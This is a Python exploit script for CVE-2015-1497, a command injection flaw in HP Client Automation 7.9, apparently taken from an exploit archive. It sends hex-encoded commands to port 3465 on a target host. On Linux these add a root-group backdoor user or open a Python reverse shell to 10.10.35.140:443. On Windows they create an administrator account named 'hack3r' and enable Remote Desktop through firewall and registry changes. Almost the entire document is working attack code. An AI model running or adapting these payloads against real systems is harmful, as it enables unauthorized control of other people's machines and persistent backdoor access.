HP Client Automation 7.9 Command Injection

`# Exploit Title: [HP Client - Automation Command Injection]  
# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot  
# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]  
# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]  
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]  
# CVE : [CVE-2015-1497]  
  
#Can run following command on linux target  
#Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'  
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"  
  
  
#Runs following command on Windows target  
#hide hide cmd.exe /c net user hack3r "hack3r" /add  
#hide hide cmd.exe /c net localgroup administrators hack3r /add  
#hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add  
#hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable  
#hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL  
#hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f  
  
  
import sys,socket  
  
print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")  
  
def exploit_Linux(target_IP,exploit_param):  
if exploit_param == "1":  
print("\n[+]Adding privileged user amiroot/nopass")  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Successfully added user amiroot/nopass")  
else:  
print("[-]Failed to add user amiroot/nopass")  
s.close()  
  
elif exploit_param == "2":  
print("\n[+]Trying to get a reverse shell")  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
  
#Change this  
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass")  
else:  
print("[-]Failed to get reverse shell")  
s.close()  
  
else:  
print("\n[-]Invalid exploit parameter provided for Linux target")  
sys.exit()  
  
  
def exploit_Windows(target_IP):  
  
counter = 0  
print("[+]Adding a local user hack3r/hack3r")  
  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Successfully added user hack3r/hack3r")  
counter+= 1  
else:  
print("[-]Failed to add user hack3r/hack3r")  
s.close()  
  
  
print("[+]Adding user 'hack3r' to Local Administrator's group")  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Successfully added user 'hack3r' to Local Administrators group")  
counter+= 1  
else:  
print("[-]Failed to add user to 'hack3r' Local Administrators group")  
s.close()  
  
#Add user Hack3r to "Remote Desktop Users" Group  
print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group")  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group")  
counter+= 1  
else:  
print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group")  
s.close()  
  
#Enable RDP  
print("[+]Trying to enable Remote Desktop Service")  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Successfully enabled Remote Desktop Service")  
counter+= 1  
else:  
print("[-]Failed to enable Remote Desktop Service")  
s.close()  
  
  
#Enable RDP for all profiles  
print("[+]Trying to enable Remote Desktop Service for all firewall profiles")  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Successfully enabled Remote Desktop Service for all firewall profiles")  
counter+= 1  
else:  
print("[-]Failed to enable Remote Desktop Service for all firewall profiles")  
s.close()  
  
#Setup target to listen for RDP connections  
print("[+]Setting up the target server to listen to RDP connections")  
request = "\x00"  
request+= "\x31\x32\x33\x31\x32\x33\x00"  
request+= "\x41\x42\x43\x00"  
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_IP, 3465))  
s.send(request)  
response = s.recv(1024)  
  
if response == "\x00":  
print("[+]Successfully setup the target server to listen to RDP connections")  
counter+= 1  
else:  
print("[-]Failed to setup the target server to listen to RDP connections")  
s.close()  
  
if counter == 6:  
print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r")  
else:  
print("\n[-]Exploit Failed..")  
  
#main() function here  
def main():  
  
if len(sys.argv) < 2:  
print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell"  
sys.exit()  
  
target_IP = sys.argv[1]  
target_OS = sys.argv[2].lower()  
  
if target_OS == "windows":  
exploit_Windows(target_IP)  
elif target_OS == "linux":  
exploit_param = sys.argv[3]  
exploit_Linux(target_IP,exploit_param)  
else:  
print("\n[-]Invalid taret Operating System selected.")  
sys.exit()  
  
if __name__ == '__main__':  
main()  
`